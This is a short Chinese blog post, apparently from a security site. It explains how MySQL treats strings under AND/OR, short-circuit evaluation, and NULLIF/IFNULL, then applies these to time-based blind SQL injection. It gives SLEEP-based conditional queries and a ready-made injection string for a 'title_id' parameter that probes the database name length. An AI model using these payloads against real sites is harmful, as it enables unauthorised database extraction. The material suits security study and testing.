
1、翻了下msyql问文档,貌似没看到对select中 and or的描述;

结论:
当字符串全部为字母,则0
当字符串第一个字符为数字,则为1
当字符串第一个字符为+-.,后面紧跟为数字时,为1当空值null 与数字 ,则为0;与0 则为null
::null介于1与0 之间
2、SQL语句的短路 and 短路or:
mysql中 and即&& or即 || 本身为短路与或;
SELECT 'xxxx' AND ( SELECT CASE WHEN 11 = 11 THEN SLEEP(1) ELSE 1 END )

SELECT '111' AND ( SELECT CASE WHEN 11 = 11 THEN SLEEP(1) ELSE 1 END )

3、nullif(a,b):
当a=b,则返回null,当a!=b 则返回a;
类似于
CASE WHEN a= b THEN NULL ELSE a END
4、ifnull(a,b):
假如b不为NULL,则 IFNULL() 的返回值为a; 否则其返回值为 b。IFNULL()的返回值是数字或是字符串,具体情况取决于其所使用的语境
在实战中,结合ifnull/nullif,构造比较简单的语句:
title_id=123″ OR IFNULL((nullif(length(database()),12)),SLEEP(1)) and “1”=”1

5、更多可参考https://www.t00ls.net/viewthread.php?tid=55278
6、MySQL文档地址:
https://dev.mysql.com/doc/refman/8.0/en/control-flow-functions.html




![[python]百度の翻译接口测试 - vulsee.com-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2022/07/de36cc294bab4594d9cae93cbdcb7e58.png)


![[全专辑] 摇滚经典,不进来看是你的损失~-微慑信息网-VulSee.com](http://www.hebeimusic.com/attachments/month_0507/266567_bXf15UX3FWBA.jpg)



![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)

青云网
